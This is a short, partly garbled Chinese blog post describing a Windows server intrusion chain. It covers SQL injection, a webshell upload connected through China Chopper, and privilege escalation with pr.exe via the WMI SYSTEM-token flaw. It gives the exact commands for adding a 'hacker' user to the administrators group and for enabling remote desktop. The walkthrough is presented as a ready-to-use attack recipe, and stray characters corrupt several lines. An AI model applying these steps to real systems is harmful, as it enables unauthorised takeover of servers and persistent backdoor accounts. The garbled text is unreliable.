摘要:提供程序主機(jī)進(jìn)程在某些情況下會(huì)持有令牌�,如果攻擊者可以以或帳號(hào)訪問(wèn)計(jì)算機(jī),攻擊者就可以執(zhí)行代碼探索令牌的提供程序主機(jī)進(jìn)程�����。一旦找到了令牌���,就可以獲得權(quán)限的提升�����。
在注入成功后��,登入后臺(tái)管理��,上傳一句話��,菜刀連接
???上傳3389�,pr,cmd
打開(kāi)虛擬終端 并且切換到上傳目錄下���,
執(zhí)行pr命令����,pr “net user hacker 123 /add”��,添加用戶讓后給用戶管理員權(quán)限,pr “net localgroup administrators hacker /add”
pr 執(zhí)行3389
成功后�,mstsc遠(yuǎn)程連接桌面,并且登錄
?pr.exe 提權(quán):
?????Windows跟蹤注冊(cè)表項(xiàng)的ACL權(quán)限提升漏洞
Windows管理規(guī)范(WMI)提供程序沒(méi)有正確地隔離NetworkService或LocalService帳號(hào)下運(yùn)行的進(jìn)程���,同一帳號(hào)下運(yùn)行的兩個(gè)獨(dú)立進(jìn)程可以完全訪問(wèn)對(duì)方的文件句柄�、注冊(cè)表項(xiàng)等資源�。WMI提供程序主機(jī)進(jìn)程在某些情況下會(huì)持有SYSTEM令牌�����,如果攻擊者可以以 NetworkService或LocalService帳號(hào)訪問(wèn)計(jì)算機(jī)����,攻擊者就可以執(zhí)行代碼探索SYSTEM令牌的WMI提供程序主機(jī)進(jìn)程。一旦找到了SYSTEM令牌�,就可以獲得SYSTEM權(quán)限的提升。
文章版權(quán)歸作者所有�,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除��。
轉(zhuǎn)載請(qǐng)注明本文地址:http://systransis.cn/yun/88827.html
